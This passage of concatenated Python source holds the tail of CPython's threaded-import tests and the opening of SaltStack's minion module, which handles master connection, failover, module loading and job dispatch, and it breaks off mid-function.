doesn't allow to unregister callbacks and would leak # memory. return mock.patch('os.register_at_fork', create=True)(func) # Create a circular import structure: A -> C -> B -> D -> A # NOTE: `time` is already loaded and therefore doesn't threaten to deadlock. circular_imports_modules = { 'A': """if 1: import time time.sleep(%(delay)s) x = 'a' import C """, 'B': """if 1: import time time.sleep(%(delay)s) x = 'b' import D """, 'C': """import B""", 'D': """import A""", } class Finder: """A dummy finder to detect concurrent access to its find_spec() method.""" def __init__(self): self.numcalls = 0 self.x = 0 self.lock = threading.Lock() def find_spec(self, name, path=None, target=None): # Simulate some thread-unsafe behaviour. If calls to find_spec() # are properly serialized, `x` will end up the same as `numcalls`. # Otherwise not. assert imp.lock_held() with self.lock: self.numcalls += 1 x = self.x time.sleep(0.01) self.x = x + 1 class FlushingFinder: """A dummy finder which flushes sys.path_importer_cache when it gets called.""" def find_spec(self, name, path=None, target=None): sys.path_importer_cache.clear() class ThreadedImportTests(unittest.TestCase): def setUp(self): self.old_random = sys.modules.pop('random', None) def tearDown(self): # If the `random` module was already initialized, we restore the # old module at the end so that pickling tests don't fail. # See http://bugs.python.org/issue3657#msg110461 if self.old_random is not None: sys.modules['random'] = self.old_random @mock_register_at_fork def check_parallel_module_init(self, mock_os): if imp.lock_held(): # This triggers on, e.g., from test import autotest. raise unittest.SkipTest("can't run when import lock is held") done = threading.Event() for N in (20, 50) * 3: if verbose: print("Trying", N, "threads ...", end=' ') # Make sure that random and modulefinder get reimported freshly for modname in ['random', 'modulefinder']: try: del sys.modules[modname] except KeyError: pass errors = [] done_tasks = [] done.clear() t0 = time.monotonic() with threading_helper.start_threads( threading.Thread(target=task, args=(N, done, done_tasks, errors,)) for i in range(N)): pass completed = done.wait(10 * 60) dt = time.monotonic() - t0 if verbose: print("%.1f ms" % (dt*1e3), flush=True, end=" ") dbg_info = 'done: %s/%s' % (len(done_tasks), N) self.assertFalse(errors, dbg_info) self.assertTrue(completed, dbg_info) if verbose: print("OK.") def test_parallel_module_init(self): self.check_parallel_module_init() def test_parallel_meta_path(self): finder = Finder() sys.meta_path.insert(0, finder) try: self.check_parallel_module_init() self.assertGreater(finder.numcalls, 0) self.assertEqual(finder.x, finder.numcalls) finally: sys.meta_path.remove(finder) def test_parallel_path_hooks(self): # Here the Finder instance is only used to check concurrent calls # to path_hook(). finder = Finder() # In order for our path hook to be called at each import, we need # to flush the path_importer_cache, which we do by registering a # dedicated meta_path entry. flushing_finder = FlushingFinder() def path_hook(path): finder.find_spec('') raise ImportError sys.path_hooks.insert(0, path_hook) sys.meta_path.append(flushing_finder) try: # Flush the cache a first time flushing_finder.find_spec('') numtests = self.check_parallel_module_init() self.assertGreater(finder.numcalls, 0) self.assertEqual(finder.x, finder.numcalls) finally: sys.meta_path.remove(flushing_finder) sys.path_hooks.remove(path_hook) def test_import_hangers(self): # In case this test is run again, make sure the helper module # gets loaded from scratch again. try: del sys.modules['test.test_importlib.threaded_import_hangers'] except KeyError: pass import test.test_importlib.threaded_import_hangers self.assertFalse(test.test_importlib.threaded_import_hangers.errors) def test_circular_imports(self): # The goal of this test is to exercise implementations of the import # lock which use a per-module lock, rather than a global lock. # In these implementations, there is a possible deadlock with # circular imports, for example: # - thread 1 imports A (grabbing the lock for A) which imports B # - thread 2 imports B (grabbing the lock for B) which imports A # Such implementations should be able to detect such situations and # resolve them one way or the other, without freezing. # NOTE: our test constructs a slightly less trivial import cycle, # in order to better stress the deadlock avoidance mechanism. delay = 0.5 os.mkdir(TESTFN) self.addCleanup(shutil.rmtree, TESTFN) sys.path.insert(0, TESTFN) self.addCleanup(sys.path.remove, TESTFN) for name, contents in circular_imports_modules.items(): contents = contents % {'delay': delay} with open(os.path.join(TESTFN, name + ".py"), "wb") as f: f.write(contents.encode('utf-8')) self.addCleanup(forget, name) importlib.invalidate_caches() results = [] def import_ab(): import A results.append(getattr(A, 'x', None)) def import_ba(): import B results.append(getattr(B, 'x', None)) t1 = threading.Thread(target=import_ab) t2 = threading.Thread(target=import_ba) t1.start() t2.start() t1.join() t2.join() self.assertEqual(set(results), {'a', 'b'}) @mock_register_at_fork def test_side_effect_import(self, mock_os): code = """if 1: import threading def target(): import random t = threading.Thread(target=target) t.start() t.join() t = None""" sys.path.insert(0, os.curdir) self.addCleanup(sys.path.remove, os.curdir) filename = TESTFN + ".py" with open(filename, "wb") as f: f.write(code.encode('utf-8')) self.addCleanup(unlink, filename) self.addCleanup(forget, TESTFN) self.addCleanup(rmtree, '__pycache__') importlib.invalidate_caches() __import__(TESTFN) del sys.modules[TESTFN] @threading_helper.reap_threads def test_main(): old_switchinterval = None try: old_switchinterval = sys.getswitchinterval() sys.setswitchinterval(1e-5) except AttributeError: pass try: run_unittest(ThreadedImportTests) finally: if old_switchinterval is not None: sys.setswitchinterval(old_switchinterval) if __name__ == "__main__": test_main()
minion.py
# -*- coding: utf-8 -*- ''' Routines to set up a minion ''' # Import python libs from __future__ import absolute_import, print_function import os import re import sys import copy import time import types import signal import fnmatch import logging import threading import traceback import multiprocessing from random import randint, shuffle from salt.config import DEFAULT_MINION_OPTS from stat import S_IMODE # Import Salt Libs # pylint: disable=import-error,no-name-in-module,redefined-builtin import salt.ext.six as six if six.PY3: import ipaddress else: import salt.ext.ipaddress as ipaddress from salt.ext.six.moves import range # pylint: enable=no-name-in-module,redefined-builtin # Import third party libs try: import zmq # TODO: cleanup import zmq.eventloop.ioloop # support pyzmq 13.0.x, TODO: remove once we force people to 14.0.x if not hasattr(zmq.eventloop.ioloop, 'ZMQIOLoop'): zmq.eventloop.ioloop.ZMQIOLoop = zmq.eventloop.ioloop.IOLoop HAS_ZMQ = True except ImportError: # Running in local, zmq not needed HAS_ZMQ = False HAS_RANGE = False try: import seco.range HAS_RANGE = True except ImportError: pass HAS_PSUTIL = False try: import salt.utils.psutil_compat as psutil HAS_PSUTIL = True except ImportError: pass HAS_RESOURCE = False try: import resource HAS_RESOURCE = True except ImportError: pass try: import zmq.utils.monitor HAS_ZMQ_MONITOR = True except ImportError: HAS_ZMQ_MONITOR = False # pylint: enable=import-error # Import salt libs import salt import salt.client import salt.crypt import salt.loader import salt.beacons import salt.payload import salt.syspaths import salt.utils import salt.utils.jid import salt.pillar import salt.utils.args import salt.utils.event import salt.utils.minions import salt.utils.schedule import salt.utils.error import salt.utils.zeromq import salt.defaults.exitcodes import salt.cli.daemons from salt.defaults import DEFAULT_TARGET_DELIM from salt.executors import FUNCTION_EXECUTORS from salt.utils.debug import enable_sigusr1_handler from salt.utils.event import tagify from salt.exceptions import ( CommandExecutionError, CommandNotFoundError, SaltInvocationError, SaltReqTimeoutError, SaltClientError, SaltSystemExit ) import tornado.gen # pylint: disable=F0401 import tornado.ioloop # pylint: disable=F0401 log = logging.getLogger(__name__) # To set up a minion: # 1. Read in the configuration # 2. Generate the function mapping dict # 3. Authenticate with the master # 4. Store the AES key # 5. Connect to the publisher # 6. Handle publications def resolve_dns(opts): ''' Resolves the master_ip and master_uri options ''' ret = {} check_dns = True if (opts.get('file_client', 'remote') == 'local' and not opts.get('use_master_when_local', False)): check_dns = False if check_dns is True: # Because I import salt.log below I need to re-import salt.utils here import salt.utils try: if opts['master'] == '': raise SaltSystemExit ret['master_ip'] = \ salt.utils.dns_check(opts['master'], True, opts['ipv6']) except SaltClientError: if opts['retry_dns']: while True: import salt.log msg = ('Master hostname: \'{0}\' not found. Retrying in {1} ' 'seconds').format(opts['master'], opts['retry_dns']) if salt.log.is_console_configured(): log.error(msg) else: print('WARNING: {0}'.format(msg)) time.sleep(opts['retry_dns']) try: ret['master_ip'] = salt.utils.dns_check( opts['master'], True, opts['ipv6'] ) break except SaltClientError: pass else: ret['master_ip'] = '127.0.0.1' except SaltSystemExit: unknown_str = 'unknown address' master = opts.get('master', unknown_str) if master == '': master = unknown_str if opts.get('__role') == 'syndic': err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. Set \'syndic_master\' value in minion config.'.format(master) else: err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. Set \'master\' value in minion config.'.format(master) log.error(err) raise SaltSystemExit(code=42, msg=err) else: ret['master_ip'] = '127.0.0.1' if 'master_ip' in ret and 'master_ip' in opts: if ret['master_ip'] != opts['master_ip']: log.warning('Master ip address changed from {0} to {1}'.format(opts['master_ip'], ret['master_ip']) ) ret['master_uri'] = 'tcp://{ip}:{port}'.format(ip=ret['master_ip'], port=opts['master_port']) return ret def prep_ip_port(opts): ret = {} if opts['master_uri_format'] == 'ip_only': ret['master'] = opts['master'] else: ip_port = opts['master'].rsplit(":", 1) if len(ip_port) == 1: # e.g. master: mysaltmaster ret['master'] = ip_port[0] else: # e.g. master: localhost:1234 # e.g. master: 127.0.0.1:1234 # e.g. master: ::1:1234 ret['master'] = ip_port[0] ret['master_port'] = ip_port[1] return ret def get_proc_dir(cachedir, **kwargs): ''' Given the cache directory, return the directory that process data is stored in, creating it if it doesn't exist. The following optional Keyword Arguments are handled: mode: which is anything os.makedir would accept as mode. uid: the uid to set, if not set, or it is None or -1 no changes are made. Same applies if the directory is already owned by this uid. Must be int. Works only on unix/unix like systems. gid: the gid to set, if not set, or it is None or -1 no changes are made. Same applies if the directory is already owned by this gid. Must be int. Works only on unix/unix like systems. ''' fn_ = os.path.join(cachedir, 'proc') mode = kwargs.pop('mode', None) if mode is None: mode = {} else: mode = {'mode': mode} if not os.path.isdir(fn_): # proc_dir is not present, create it with mode settings os.makedirs(fn_, **mode) d_stat = os.stat(fn_) # if mode is not an empty dict then we have an explicit # dir mode. So lets check if mode needs to be changed. if mode: mode_part = S_IMODE(d_stat.st_mode) if mode_part != mode['mode']: os.chmod(fn_, (d_stat.st_mode ^ mode_part) | mode['mode']) if hasattr(os, 'chown'): # only on unix/unix like systems uid = kwargs.pop('uid', -1) gid = kwargs.pop('gid', -1) # if uid and gid are both -1 then go ahead with # no changes at all if (d_stat.st_uid != uid or d_stat.st_gid != gid) and \ [i for i in (uid, gid) if i != -1]: os.chown(fn_, uid, gid) return fn_ def parse_args_and_kwargs(func, args, data=None): ''' Wrap load_args_and_kwargs ''' salt.utils.warn_until( 'Boron', 'salt.minion.parse_args_and_kwargs() has been renamed to ' 'salt.minion.load_args_and_kwargs(). Please change this function call ' 'before the Boron release of Salt.' ) return load_args_and_kwargs(func, args, data=data) def load_args_and_kwargs(func, args, data=None, ignore_invalid=False): ''' Detect the args and kwargs that need to be passed to a function call, and check them against what was passed. ''' argspec = salt.utils.args.get_function_argspec(func) _args = [] _kwargs = {} invalid_kwargs = [] for arg in args: if isinstance(arg, six.string_types): string_arg, string_kwarg = salt.utils.args.parse_input([arg], condition=False) # pylint: disable=W0632 if string_arg: # Don't append the version that was just derived from parse_cli # above, that would result in a 2nd call to # salt.utils.cli.yamlify_arg(), which could mangle the input. _args.append(arg) elif string_kwarg: salt.utils.warn_until( 'Boron', 'The list of function args and kwargs should be parsed ' 'by salt.utils.args.parse_input() before calling ' 'salt.minion.load_args_and_kwargs().' ) if argspec.keywords or next(six.iterkeys(string_kwarg)) in argspec.args: # Function supports **kwargs or is a positional argument to # the function. _kwargs.update(string_kwarg) else: # **kwargs not in argspec and parsed argument name not in # list of positional arguments. This keyword argument is # invalid. for key, val in six.iteritems(string_kwarg): invalid_kwargs.append('{0}={1}'.format(key, val)) continue # if the arg is a dict with __kwarg__ == True, then its a kwarg elif isinstance(arg, dict) and arg.pop('__kwarg__', False) is True: for key, val in six.iteritems(arg): if argspec.keywords or key in argspec.args: # Function supports **kwargs or is a positional argument to # the function. _kwargs[key] = val else: # **kwargs not in argspec and parsed argument name not in # list of positional arguments. This keyword argument is # invalid. invalid_kwargs.append('{0}={1}'.format(key, val)) continue else: _args.append(arg) if invalid_kwargs and not ignore_invalid: salt.utils.invalid_kwargs(invalid_kwargs) if argspec.keywords and isinstance(data, dict): # this function accepts **kwargs, pack in the publish data for key, val in six.iteritems(data): _kwargs['__pub_{0}'.format(key)] = val return _args, _kwargs class MinionBase(object): def __init__(self, opts): self.opts = opts @staticmethod def process_schedule(minion, loop_interval): try: minion.schedule.eval() # Check if scheduler requires lower loop interval than # the loop_interval setting if minion.schedule.loop_interval < loop_interval: loop_interval = minion.schedule.loop_interval log.debug( 'Overriding loop_interval because of scheduled jobs.' ) except Exception as exc: log.error( 'Exception {0} occurred in scheduled job'.format(exc) ) return loop_interval def process_beacons(self, functions): ''' Evaluate all of the configured beacons, grab the config again in case the pillar or grains changed ''' if 'config.merge' in functions: b_conf = functions['config.merge']('beacons') if b_conf: return self.beacons.process(b_conf) return [] @tornado.gen.coroutine def eval_master(self, opts, timeout=60, safe=True, failed=False): ''' Evaluates and returns a tuple of the current master address and the pub_channel. In standard mode, just creates a pub_channel with the given master address. With master_type=func evaluates the current master address from the given module and then creates a pub_channel. With master_type=failover takes the list of masters and loops through them. The first one that allows the minion to create a pub_channel is then returned. If this function is called outside the minions initialization phase (for example from the minions main event-loop when a master connection loss was detected), 'failed' should be set to True. The current (possibly failed) master will then be removed from the list of masters. ''' # check if master_type was altered from its default if opts['master_type'] != 'str' and opts['__role'] != 'syndic': # check for a valid keyword if opts['master_type'] == 'func': # split module and function and try loading the module mod, fun = opts['master'].split('.') try: master_mod = salt.loader.raw_mod(opts, mod, fun) if not master_mod: raise TypeError # we take whatever the module returns as master address opts['master'] = master_mod[mod + '.' + fun]() except TypeError: msg = ('Failed to evaluate master address from ' 'module \'{0}\''.format(opts['master'])) log.error(msg) sys.exit(salt.defaults.exitcodes.EX_GENERIC) log.info('Evaluated master from module: {0}'.format(master_mod)) # if failover is set, master has to be of type list elif opts['master_type'] == 'failover': if isinstance(opts['master'], list): log.info('Got list of available master addresses:' ' {0}'.format(opts['master'])) if opts['master_shuffle']: shuffle(opts['master']) # if opts['master'] is a str and we have never created opts['master_list'] elif isinstance(opts['master'], str) and ('master_list' not in opts): # We have a string, but a list was what was intended. Convert. # See issue 23611 for details opts['master'] = [opts['master']] elif opts['__role'] == 'syndic': log.info('Syndic setting master_syndic to \'{0}\''.format(opts['master'])) # if failed=True, the minion was previously connected # we're probably called from the minions main-event-loop # because a master connection loss was detected. remove # the possibly failed master from the list of masters. elif failed: log.info('Removing possibly failed master {0} from list of' ' masters'.format(opts['master'])) # create new list of master with the possibly failed one removed opts['master'] = [x for x in opts['master_list'] if opts['master'] != x] else: msg = ('master_type set to \'failover\' but \'master\' ' 'is not of type list but of type ' '{0}'.format(type(opts['master']))) log.error(msg) sys.exit(salt.defaults.exitcodes.EX_GENERIC) # If failover is set, minion have to failover on DNS errors instead of retry DNS resolve. # See issue 21082 for details if opts['retry_dns']: msg = ('\'master_type\' set to \'failover\' but \'retry_dns\' is not 0. ' 'Setting \'retry_dns\' to 0 to failover to the next master on DNS errors.') log.critical(msg) opts['retry_dns'] = 0 else: msg = ('Invalid keyword \'{0}\' for variable ' '\'master_type\''.format(opts['master_type'])) log.error(msg) sys.exit(salt.defaults.exitcodes.EX_GENERIC) # Specify kwargs for the channel factory so that SMinion doesn't need to define an io_loop # (The channel factories will set a default if the kwarg isn't passed) factory_kwargs = {'timeout': timeout, 'safe': safe} if getattr(self, 'io_loop', None): factory_kwargs['io_loop'] = self.io_loop # if we have a list of masters, loop through them and be # happy with the first one that allows us to connect if isinstance(opts['master'], list): conn = False # shuffle the masters and then loop through them local_masters = copy.copy(opts['master']) for master in local_masters: opts['master'] = master opts.update(prep_ip_port(opts)) opts.update(resolve_dns(opts)) self.opts = opts # on first run, update self.opts with the whole master list # to enable a minion to re-use old masters if they get fixed if 'master_list' not in opts: opts['master_list'] = local_masters try: pub_channel = salt.transport.client.AsyncPubChannel.factory(opts, **factory_kwargs) yield pub_channel.connect() conn = True break except SaltClientError: msg = ('Master {0} could not be reached, trying ' 'next master (if any)'.format(opts['master'])) log.info(msg) continue if not conn: self.connected = False msg = ('No master could be reached or all masters denied ' 'the minions connection attempt.') log.error(msg) else: self.tok = pub_channel.auth.gen_token('salt') self.connected = True raise tornado.gen.Return((opts['master'], pub_channel)) # single master sign in else: opts.update(prep_ip_port(opts)) opts.update(resolve_dns(opts)) pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs) yield pub_channel.connect() self.tok = pub_channel.auth.gen_token('salt') self.connected = True raise tornado.gen.Return((opts['master'], pub_channel)) class SMinion(MinionBase): ''' Create an object that has loaded all of the minion module functions, grains, modules, returners etc. The SMinion allows developers to generate all of the salt minion functions and present them with these functions for general use. ''' def __init__(self, opts): # Late setup of the opts grains, so we can log from the grains module opts['grains'] = salt.loader.grains(opts) super(SMinion, self).__init__(opts) # Clean out the proc directory (default /var/cache/salt/minion/proc) if (self.opts.get('file_client', 'remote') == 'remote' or self.opts.get('use_master_when_local', False)): self.eval_master(self.opts, failed=True) self.gen_modules(initial_load=True) def gen_modules(self, initial_load=False): ''' Load all of the modules for the minion ''' self.opts['pillar'] = salt.pillar.get_pillar( self.opts, self.opts['grains'], self.opts['id'], self.opts['environment'], pillarenv=self.opts.get('pillarenv'), ).compile_pillar() self.utils = salt.loader.utils(self.opts) self.functions = salt.loader.minion_mods(self.opts, utils=self.utils, include_errors=True) self.proxy = salt.loader.proxy(self.opts, None) # TODO: remove self.function_errors = {} # Keep the funcs clean self.returners = salt.loader.returners(self.opts, self.functions) self.states = salt.loader.states(self.opts, self.functions, self.utils) self.rend = salt.loader.render(self.opts, self.functions) self.matcher = Matcher(self.opts, self.functions) self.functions['sys.reload_modules'] = self.gen_modules self.executors = salt.loader.executors(self.opts) class MasterMinion(object): ''' Create a fully loaded minion function object for generic use on the master. What makes this class different is that the pillar is omitted, otherwise everything else is loaded cleanly. ''' def __init__( self, opts, returners=True, states=True, rend=True, matcher=True, whitelist=None): self.opts = salt.config.minion_config(opts['conf_file']) self.opts.update(opts) self.whitelist = whitelist self.opts['grains'] = salt.loader.grains(opts) self.opts['pillar'] = {} self.mk_returners = returners self.mk_states = states self.mk_rend = rend self.mk_matcher = matcher self.gen_modules(initial_load=True) def gen_modules(self, initial_load=False): ''' Load all of the modules for the minion ''' self.utils = salt.loader.utils(self.opts) self.functions = salt.loader.minion_mods( self.opts, utils=self.utils, whitelist=self.whitelist, initial_load=initial_load) if self.mk_returners: self.returners = salt.loader.returners(self.opts, self.functions) if self.mk_states: self.states = salt.loader.states(self.opts, self.functions, self.utils) if self.mk_rend: self.rend = salt.loader.render(self.opts, self.functions) if self.mk_matcher: self.matcher = Matcher(self.opts, self.functions) self.functions['sys.reload_modules'] = self.gen_modules class MultiMinion(MinionBase): ''' Create a multi minion interface, this creates as many minions as are defined in the master option and binds each minion object to a respective master. ''' # timeout for one of the minions to auth with a master MINION_CONNECT_TIMEOUT = 5 def __init__(self, opts): super(MultiMinion, self).__init__(opts) self.auth_wait = self.opts['acceptance_wait_time'] self.max_auth_wait = self.opts['acceptance_wait_time_max'] zmq.eventloop.ioloop.install() self.io_loop = zmq.eventloop.ioloop.ZMQIOLoop() def _spawn_minions(self): ''' Spawn all the coroutines which will sign in to masters ''' if not isinstance(self.opts['master'], list): log.error( 'Attempting to start a multimaster system with one master') sys.exit(salt.defaults.exitcodes.EX_GENERIC) for master in set(self.opts['master']): s_opts = copy.deepcopy(self.opts) s_opts['master'] = master s_opts['multimaster'] = True s_opts['auth_timeout'] = self.MINION_CONNECT_TIMEOUT self.io_loop.spawn_callback(self._connect_minion, s_opts) @tornado.gen.coroutine def _connect_minion(self, opts): ''' Create a minion, and asynchronously connect it to a master ''' last = 0 # never have we signed in auth_wait = opts['acceptance_wait_time'] while True: try: minion = Minion(opts, self.MINION_CONNECT_TIMEOUT, False, io_loop=self.io_loop, loaded_base_name='salt.loader.{0}'.format(opts['master']), ) yield minion.connect_master() minion.tune_in(start=False) break except SaltClientError as exc: log.error('Error while bringing up minion for multi-master. Is master at {0} responding?'.format(opts['master'])) last = time.time() if auth_wait < self.max_auth_wait: auth_wait += self.auth_wait yield tornado.gen.sleep(auth_wait) # TODO: log? except Exception as e: log.critical('Unexpected error while connecting to {0}'.format(opts['master']), exc_info=True) # Multi Master Tune In def tune_in(self): ''' Bind to the masters This loop will attempt to create connections to masters it hasn't connected to yet, but once the initial connection is made it is up to ZMQ to do the reconnect (don't know of an API to get the state here in salt) ''' # Fire off all the minion coroutines self.minions = self._spawn_minions() # serve forever! self.io_loop.start() class Minion(MinionBase): ''' This class instantiates a minion, runs connections for a minion, and loads all of the functions into the minion ''' def __init__(self, opts, timeout=60, safe=True, loaded_base_name=None, io_loop=None): # pylint: disable=W0231 ''' Pass in the options dict ''' # this means that the parent class doesn't know *which* master we connect to super(Minion, self).__init__(opts) self.timeout = timeout self.safe = safe self._running = None self.win_proc = [] self.loaded_base_name = loaded_base_name if io_loop is None: zmq.eventloop.ioloop.install() self.io_loop = zmq.eventloop.ioloop.ZMQIOLoop() else: self.io_loop = io_loop # Warn if ZMQ < 3.2 if HAS_ZMQ: try: zmq_version_info = zmq.zmq_version_info() except AttributeError: # PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to # using zmq.zmq_version() and build a version info tuple. zmq_version_info = tuple( [int(x) for x in zmq.zmq_version().split('.')] ) if zmq_version_info < (3, 2): log.warning( 'You have a version of ZMQ less than ZMQ 3.2! There are ' 'known connection keep-alive issues with ZMQ < 3.2 which ' 'may result in loss of contact with minions. Please ' 'upgrade your ZMQ!' ) # Late setup the of the opts grains, so we can log from the grains # module if 'proxyid' not in self.opts: self.opts['grains'] = salt.loader.grains(opts) # TODO: remove? def sync_connect_master(self): ''' Block until we are connected to a master ''' log.debug("sync_connect_master") self._connect_master_future = self.connect_master() # finish connecting to master self._connect_master_future.add_done_callback(lambda f: self.io_loop.stop()) self.io_loop.start() # I made the following 3 line oddity to preserve traceback. # Please read PR #23978 before changing, hopefully avoiding regressions. # Good luck, we're all counting on you. Thanks. future_exception = self._connect_master_future.exc_info() if future_exception: raise six.reraise(*future_exception) @tornado.gen.coroutine def connect_master(self): ''' Return a future which will complete when you are connected to a master ''' master, self.pub_channel = yield self.eval_master(self.opts, self.timeout, self.safe) yield self._post_master_init(master) # TODO: better name... @tornado.gen.coroutine def _post_master_init(self, master): ''' Function to finish init after connecting to a master This is primarily loading modules, pillars, etc. (since they need to know which master they connected to) ''' self.opts['master'] = master self.opts['pillar'] = yield salt.pillar.get_async_pillar( self.opts, self.opts['grains'], self.opts['id'], self.opts['environment'], pillarenv=self.opts.get('pillarenv') ).compile_pillar() self.functions, self.returners, self.function_errors, self.executors = self._load_modules() self.serial = salt.payload.Serial(self.opts) self.mod_opts = self._prep_mod_opts() self.matcher = Matcher(self.opts, self.functions) self.beacons = salt.beacons.Beacon(self.opts, self.functions) uid = salt.utils.get_uid(user=self.opts.get('user', None)) self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid) self.schedule = salt.utils.schedule.Schedule( self.opts, self.functions, self.returners) # add default scheduling jobs to the minions scheduler if 'mine.update' in self.functions: log.info('Added mine.update to scheduler') self.schedule.add_job({ '__mine_interval': { 'function': 'mine.update', 'minutes': self.opts['mine_interval'], 'jid_include': True, 'maxrunning': 2 } }, persist=True) # add master_alive job if enabled if self.opts['master_alive_interval'] > 0: self.schedule.add_job({ '__master_alive': { 'function': 'status.master', 'seconds': self.opts['master_alive_interval'], 'jid_include': True, 'maxrunning': 1, 'kwargs': {'master': self.opts['master'], 'connected': True} } }, persist=True) self.grains_cache = self.opts['grains'] def _return_retry_timer(self): ''' Based on the minion configuration, either return a randomized timer or just return the value of the return_retry_timer. ''' msg = 'Minion return retry timer set to {0} seconds' if self.opts.get('return_retry_random'): try: random_retry = randint(1, self.opts['return_retry_timer']) except ValueError: # Catch wiseguys using negative integers here log.error( 'Invalid value ({0}) for return_retry_timer, must be a ' 'positive integer'.format(self.opts['return_retry_timer']) ) log.debug(msg.format(DEFAULT_MINION_OPTS['return_retry_timer'])) return DEFAULT_MINION_OPTS['return_retry_timer'] else: log.debug(msg.format(random_retry) + ' (randomized)') return random_retry else: log.debug(msg.format(self.opts.get('return_retry_timer'))) return self.opts.get('return_retry_timer') def _prep_mod_opts(self): ''' Returns a copy of the opts with key bits stripped out ''' mod_opts = {} for key, val in six.iteritems(self.opts): if key == 'logger': continue mod_opts[key] = val return mod_opts def _process_beacons(self): ''' Process each beacon and send events if appropriate ''' # Process Beacons try: beacons = self.process_beacons(self.functions) except Exception as exc: log.critical('Beacon processing failed: {0}. No beacons will be processed.'.format(traceback.format_exc(exc))) beacons = None if beacons: self._fire_master(events=beacons) for beacon in beacons: serialized_data = salt.utils.dicttrim.trim_dict( self.serial.dumps(beacon['data']), self.opts.get('max_event_size', 1048576), is_msgpacked=True, ) log.debug('Sending event - data = {0}'.format(beacon['data'])) event = '{0}{1}{2}'.format( beacon['tag'], salt.utils.event.TAGEND, serialized_data, ) self.event_publisher.handle_publish([event]) def _load_modules(self, force_refresh=False, notify=False): ''' Return the functions and the returners loaded up from the loader module ''' # if this is a *nix system AND modules_max_memory is set, lets enforce # a memory limit on module imports # this feature ONLY works on *nix like OSs (resource module doesn't work on windows) modules_max_memory = False if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE: log.debug('modules_max_memory set, enforcing a maximum of {0}'.format(self.opts['modules_max_memory'])) modules_max_memory = True old_mem_limit = resource.getrlimit(resource.RLIMIT_AS) rss, vms = psutil.Process(os.getpid()).memory_info() mem_limit = rss + vms + self.opts['modules_max_memory'] resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit)) elif self.opts.get('modules_max_memory', -1) > 0: if not HAS_PSUTIL: log.error('Unable to enforce modules_max_memory because psutil is missing') if not HAS_RESOURCE: log.error('Unable to enforce modules_max_memory because resource is missing') self.opts['grains'] = salt.loader.grains(self.opts, force_refresh) self.utils = salt.loader.utils(self.opts) if self.opts.get('multimaster', False): s_opts = copy.deepcopy(self.opts) functions = salt.loader.minion_mods(s_opts, utils=self.utils, loaded_base_name=self.loaded_base_name, notify=notify) else: functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=notify) returners = salt.loader.returners(self.opts, functions) errors = {} if '_errors' in functions: errors = functions['_errors'] functions.pop('_errors') # we're done, reset the limits! if modules_max_memory is True: resource.setrlimit(resource.RLIMIT_AS, old_mem_limit) executors = salt.loader.executors(self.opts, functions) return functions, returners, errors, executors def _fire_master(self, data=None, tag=None, events=None, pretag=None, timeout=60): ''' Fire an event on the master, or drop message if unable to send. ''' load = {'id': self.opts['id'], 'cmd': '_minion_event', 'pretag': pretag, 'tok': self.tok} if events: load['events'] = events elif data and tag: load['data'] = data load['tag'] = tag elif not data and tag: load['data'] = {} load['tag'] = tag else: return channel = salt.transport.Channel.factory(self.opts) try: result = channel.send(load, timeout=timeout) return True except Exception: log.info('fire_master failed: {0}'.format(traceback.format_exc())) return False def _handle_decoded_payload(self, data): ''' Override this method if you wish to handle the decoded data differently. ''' if 'user' in data: log.info( 'User {0[user]} Executing command {0[fun]} with jid ' '{0[jid]}'.format(data) ) else: log.info( 'Executing command {0[fun]} with jid {0[jid]}'.format(data) ) log.debug('Command details {0}'.format(data)) if isinstance(data['fun'], six.string_types): if data['fun'] == 'sys.reload_modules': self.functions, self.returners, self.function_errors, self.executors = self._load_modules() self.schedule.functions = self.functions self.schedule.returners = self.returners if isinstance(data['fun'], tuple) or isinstance(data['fun'], list): target = Minion._thread_multi_return else: target = Minion._thread_return # We stash an instance references to allow for the socket # communication in Windows. You can't pickle functions, and thus # python needs to be able to reconstruct the reference on the other # side. instance = self if self.opts['multiprocessing']: if sys.platform.startswith('win'): # let python reconstruct the minion on the other side if we're # running on windows instance = None process = multiprocessing.Process( target=target, args=(instance, self.opts, data) ) else: process = threading.Thread( target=target, args=(instance, self.opts, data), name=data['jid'] ) process.start() if not sys.platform.startswith('win'): process.join() else: self.win_proc.append(process) @classmethod def _thread_return(cls, minion_instance, opts, data): ''' This method should be used as a threading target, start the actual minion side execution. ''' # this seems awkward at first, but it's a workaround for Windows # multiprocessing communication. if sys.platform.startswith('win') and \ opts['multiprocessing'] and \ not salt.log.is_logging_configured(): # We have to re-init the logging system for Windows salt.log.setup_console_logger(log_level=opts.get('log_level', 'info')) if opts.get('log_file'): salt.log.setup_logfile_logger(opts['log_file'], opts.get('log_level_logfile', 'info')) if not minion_instance: minion_instance = cls(opts) if not hasattr(minion_instance, 'functions'): functions, returners, function_errors, executors = ( minion_instance._load_modules() ) minion_instance.functions = functions minion_instance.returners = returners minion_instance.function_errors = function_errors minion_instance.executors = executors if not hasattr(minion_instance, 'serial'): minion_instance.serial = salt.payload.Serial(opts) if not hasattr(minion_instance, 'proc_dir'): uid = salt.utils.get_uid(user=opts.get('user', None)) minion_instance.proc_dir = ( get_proc_dir(opts['cachedir'], uid=uid) ) fn_ = os.path.join(minion_instance.proc_dir, data['jid']) if opts['multiprocessing']: salt.utils.daemonize_if(opts) salt.utils.appendproctitle(data['jid']) sdata = {'pid': os.getpid()} sdata.update(data) log.info('Starting a new job with PID {0}'.format(sdata['pid'])) with salt.utils.fopen(fn_, 'w+b') as fp_: fp_.write(minion_instance.serial.dumps(sdata)) ret = {'success': False} function_name = data['fun'] if function_name in minion_instance.functions: try: func = minion_instance.functions[function_name] args, kwargs = load_args_and_kwargs( func, data['arg'], data) minion_instance.functions.pack['__context__']['retcode'] = 0 executors = data.get('module_executors') or opts.get('module_executors', ['direct_call.get']) if isinstance(executors, six.string_types): executors = [executors] elif not isinstance(executors, list) or not executors: raise SaltInvocationError("Wrong executors specification: {0}. String or non-empty list expected". format(executors)) if opts.get('sudo_user', '') and executors[-1] != 'sudo.get': if executors[-1] in FUNCTION_EXECUTORS: executors[-1] = 'sudo.get' # replace else: executors.append('sudo.get') # append log.trace("Executors list {0}".format(executors)) # Get executors def get_executor(name): executor_class = 